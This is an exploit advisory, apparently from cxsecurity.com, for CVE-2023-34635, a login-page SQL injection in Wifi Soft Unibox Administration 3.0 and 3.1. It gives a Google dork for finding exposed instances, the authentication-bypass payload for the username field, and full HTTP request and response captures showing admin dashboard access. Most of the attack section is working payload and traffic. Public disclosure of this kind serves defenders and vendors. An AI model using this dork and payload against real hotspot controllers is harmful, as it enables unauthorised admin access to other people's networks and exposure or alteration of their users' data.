Wifi Soft Unibox Administration 3.0 / 3.1 SQL Injection

2023.07.21
Credit: Ansh Jain
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89

# Exploit Title: Wifi Soft Unibox Administration 3.0 & 3.1 Login Page - Sql Injection # Google Dork: intext:"Unibox Administration 3.1", intext:"Unibox 3.0" # Date: 07/2023 # Exploit Author: Ansh Jain @sudoark # Author Contact : arkinux01@gmail.com # Vendor Homepage: https://www.wifi-soft.com/ # Software Link: https://www.wifi-soft.com/products/unibox-hotspot-controller.php # Version: Unibox Administration 3.0 & 3.1 # Tested on: Microsoft Windows 11 # CVE : CVE-2023-34635 # CVE URL : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34635 The Wifi Soft Unibox Administration 3.0 and 3.1 Login Page is vulnerable to SQL Injection, which can lead to unauthorised admin access for attackers. The vulnerability occurs because of not validating or sanitising the user input in the username field of the login page and directly sending the input to the backend server and database. ## How to Reproduce Step 1 : Visit the login page and check the version, whether it is 3.0, 3.1, or not. Step 2 : Add this payload " 'or 1=1 limit 1-- - " to the username field and enter any random password. Step 3 : Fill in the captcha and hit login. After hitting login, you have been successfully logged in as an administrator and can see anyone's user data, modify data, revoke access, etc. -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ### Login Request -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------------------------------------------------------------------------------------- Parameters: username, password, captcha, action ----------------------------------------------------------------------------------------------------------------------- POST /index.php HTTP/2 Host: 255.255.255.255.host.com Cookie: PHPSESSID=rfds9jjjbu7jorb9kgjsko858d User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 83 Origin: https://255.255.255.255.host.com Referer: https://255.255.255.255.host.com/index.php Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers username='or+1=1+limit+1--+-&password=randompassword&captcha=69199&action=Login -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ### Login Response -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- HTTP/2 302 Found Server: nginx Date: Tue, 18 Jul 2023 13:32:14 GMT Content-Type: text/html; charset=UTF-8 Location: ./dashboard/dashboard Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ### Successful Loggedin Request -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- GET /dashboard/dashboard HTTP/2 Host: 255.255.255.255.host.com Cookie: PHPSESSID=rfds9jjjbu7jorb9kgjsko858d User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://255.255.255.255.host.com/index.php Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ### Successful Loggedin Response -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- HTTP/2 200 OK Server: nginx Date: Tue, 18 Jul 2023 13:32:43 GMT Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Cache_control: private <!DOCTYPE html> <html lang="en"> html content </html>


Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top